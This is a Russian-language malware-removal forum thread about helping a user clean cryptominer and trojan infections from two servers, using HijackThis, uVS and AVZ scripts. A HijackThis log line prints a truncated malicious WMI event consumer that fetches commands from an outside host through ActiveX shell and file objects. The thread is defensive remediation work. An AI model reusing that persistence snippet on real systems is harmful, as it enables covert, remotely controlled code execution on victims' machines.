Grohatan Опубликовано 6 апреля, 2018 Опубликовано 6 апреля, 2018 Подцепил заразу логи прилагаю, помогите!!! На двух серверах стоит Kaspersky Endpoint Security 10, частенько обнаруживает и удаляет lsmosee.exe, mysa 2.exe,mysa3.exe и a.exe. HEUR: Trojan.Multi.Runner.k, HEUR: Trojan.Win32.Generic, Trojan.Win32.Miner.tvnc CollectionLog-2018.04.06-15.08.zip CollectionLog-2018.04.06-15.53.zip
Sandor Опубликовано 6 апреля, 2018 Опубликовано 6 апреля, 2018 Здравствуйте! Пожалуйста, одна тема - один компьютер. Здесь будем продолжать по этим отчетам - CollectionLog-2018.04.06-15.08.zip "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes) Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования, Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да". Подробнее читайте в руководстве Как подготовить лог UVS.+ Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
Grohatan Опубликовано 11 апреля, 2018 Автор Опубликовано 11 апреля, 2018 ссылка : http://virusinfo.info/virusdetector/report.php?md5=03D28BCA26A0BA65B419F3CD06591541 TSERVER_2018-04-11_21-30-45.7z
Sandor Опубликовано 12 апреля, 2018 Опубликовано 12 апреля, 2018 Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена: ;uVS v4.0.11 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- bl 030451AC439C1490C63A8D9A078611CA 679 zoo E:\AUTORUN.INF delall E:\AUTORUN.INF bl 00B87FC624B54A31DF8C29C040F55425 659 zoo D:\AUTORUN.INF delall D:\AUTORUN.INF delref %SystemRoot%\DEBUG\ITEM.DAT delref %SystemRoot%\DEBUG\OK.DAT delref %SystemDrive%\USERS\MUSAGITOVA\APPDATA\LOCAL\TEMP\37\V8_3BF2_13.TMP delref %SystemDrive%\USERS\GIMALETDINOVA.TSERVER\APPDATA\LOCAL\TEMP\31\V8_4BA6_14.TMP delref %SystemDrive%\USERS\MUSAGITOVA\APPDATA\LOCAL\TEMP\37\V8_57CB_10.TMP delref %SystemDrive%\USERS\GIMALETDINOVA.TSERVER\APPDATA\LOCAL\TEMP\31\V8_638E_16.TMP delref %SystemDrive%\USERS\SAFAROVA\APPDATA\LOCAL\TEMP\35\V8_64A7_13.TMP delref %SystemDrive%\USERS\RENAT\APPDATA\LOCAL\TEMP\2\V8_6618_12.TMP delref %SystemDrive%\USERS\ARSLANOVA\APPDATA\LOCAL\TEMP\34\V8_6CB2_13.TMP delref %SystemDrive%\USERS\MIHAILOVA\APPDATA\LOCAL\TEMP\64\V8_7574_14.TMP delref %SystemDrive%\USERS\ANDREEVA\APPDATA\LOCAL\TEMP\33\V8_7C53_14.TMP delref %SystemDrive%\USERS\ANDREEVA\APPDATA\LOCAL\TEMP\33\V8_85EC_18.TMP delref %SystemDrive%\USERS\SHAIHUTDINOVA\APPDATA\LOCAL\TEMP\55\V8_9067_13.TMP delref %SystemDrive%\USERS\MIHAILOVA\APPDATA\LOCAL\TEMP\7\V8_A1CD_F.TMP delref %SystemDrive%\USERS\TARANENKO\APPDATA\LOCAL\TEMP\63\V8_A629_13.TMP delref %SystemDrive%\USERS\MUDARISOVA\APPDATA\LOCAL\TEMP\76\V8_BDDD_14.TMP delref %SystemDrive%\USERS\MUMRIKOVA\APPDATA\LOCAL\TEMP\30\V8_CA2C_13.TMP delref %SystemDrive%\USERS\SAFAROVA\APPDATA\LOCAL\TEMP\35\V8_E8C5_F.TMP delref %SystemDrive%\USERS\SAGLAEVA\APPDATA\LOCAL\TEMP\81\V8_F2B3_14.TMP apply czoo В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z) Если архив отсутствует, то заархивруйте папку ZOO с паролем virus. Полученный архив отправьте на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. Подробнее читайте в этом руководстве. Сообщите что с проблемой.
Grohatan Опубликовано 15 апреля, 2018 Автор Опубликовано 15 апреля, 2018 Инструкцию выполнил. Архив отправил. На сервере стоит лицензионный Kaspersky Security 10.1, с 11 числа вирусов не обнаружено.
regist Опубликовано 15 апреля, 2018 Опубликовано 15 апреля, 2018 Выполните скрипт в AVZ при наличии доступа в интернет: var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end. После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.Выполните рекомендации после лечения.
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти